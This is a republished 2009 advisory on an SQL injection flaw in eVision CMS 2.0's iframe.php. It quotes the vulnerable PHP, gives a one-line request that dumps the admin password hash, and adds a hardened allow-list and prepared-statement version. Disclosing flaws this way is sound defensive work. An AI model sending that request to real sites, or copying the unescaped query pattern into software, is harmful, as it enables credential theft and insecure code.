eVision CMS <= 2.0 (field) SQL Injection Vulnerability
Source: vfocus.net  Author: vfocus  Published: 2009-02-02
--+++============================================================+++--
--+++====== eVision CMS <= 2.0 SQL Injection Vulnerability ======+++--
--+++============================================================+++--

[+] Author  : darkjoker
[+] Site    : http://darkjoker.net23.net
[+] Download: http://kent.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz

[+] Vulnerable code:

    // 'field', 'module' and 'id' come straight from the query string and are
    // concatenated into the SQL statement without validation or escaping.
    $sql = "SELECT `".$_GET['field']."` FROM ".$_GET['module']." WHERE `id".$_GET['module']."`='".$_GET['id']."'";
    $result = mysql_query($sql);
    $row = mysql_fetch_array($result);

    if ( isset($_GET['div']) ) { $div = 'class="'.$_GET['div'].'"'; }
    else { $div = ''; }
    if ( isset($_GET['font']) ) { $font = 'class="'.$_GET['font'].'"'; }
    else { $font = ''; }

    echo '
    <html '.$div.'>
    <head>
            <meta http-equiv="Content-Type" content="text/html; charset='.$charset.'">
            <link rel="stylesheet" type="text/css" href="'.$path.'style.php?template='.$template.'&module='.$_GET['module'].'">
    </head>
    <body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0" '.$font.'>'.set_text($row[$_GET['field']]).'</body>
    </html>
    ';


[+] The following request prints the admin's password (hashed):

[+] /iframe.php?field=pass&module=users&id=1

# [2009-01-30]
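
[+] Added example (not part of the original advisory or of the eVision code base): a hardened form of the query shown above, with the column and table names checked against an allow-list and the id bound as a parameter. The function name fetch_field, the ALLOWED_FIELDS entries, the PDO connection and the demo schema are assumptions made for illustration.

```php
<?php
// Added example, not eVision code. The allow-list entries and the demo
// schema are constructed placeholders; the real schema is not on the page.
const ALLOWED_FIELDS = [
    'news'  => ['title', 'body'],
    'pages' => ['title', 'body'],
];

// Hypothetical hardened replacement for the query built from $_GET.
// Returns the column value, or null if the request is rejected or no row matches.
function fetch_field(PDO $pdo, array $get): ?string
{
    $module = $get['module'] ?? '';
    $field  = $get['field'] ?? '';

    // Identifiers cannot be bound as parameters, so accept them only on an
    // exact, strict match against the allow-list.
    if (!is_string($module) || !is_string($field)
        || !array_key_exists($module, ALLOWED_FIELDS)
        || !in_array($field, ALLOWED_FIELDS[$module], true)) {
        return null;
    }
    // The id is a value: require a positive integer and bind it.
    $id = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // Same shape as the original query; only vetted identifiers are interpolated.
    $sql  = sprintf('SELECT `%s` FROM `%s` WHERE `id%s` = ?', $field, $module, $module);
    $stmt = $pdo->prepare($sql);
    $stmt->execute([$id]);
    $value = $stmt->fetchColumn();

    return $value === false ? null : (string) $value;
}

// Constructed demo data in an in-memory SQLite database (SQLite accepts
// MySQL-style backtick quoting); production code would connect to MySQL.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE news (idnews INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$pdo->exec('CREATE TABLE users (idusers INTEGER PRIMARY KEY, pass TEXT)');
$pdo->exec("INSERT INTO news VALUES (1, 'Hello', 'Body text')");
$pdo->exec("INSERT INTO users VALUES (1, 'constructed-hash')");

var_dump(fetch_field($pdo, ['field' => 'title', 'module' => 'news', 'id' => '1']));
var_dump(fetch_field($pdo, ['field' => 'pass', 'module' => 'users', 'id' => '1']));
```

The first call passes both checks and reads the news title; the second is rejected before any SQL is built because `users` is not in the allow-list.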

 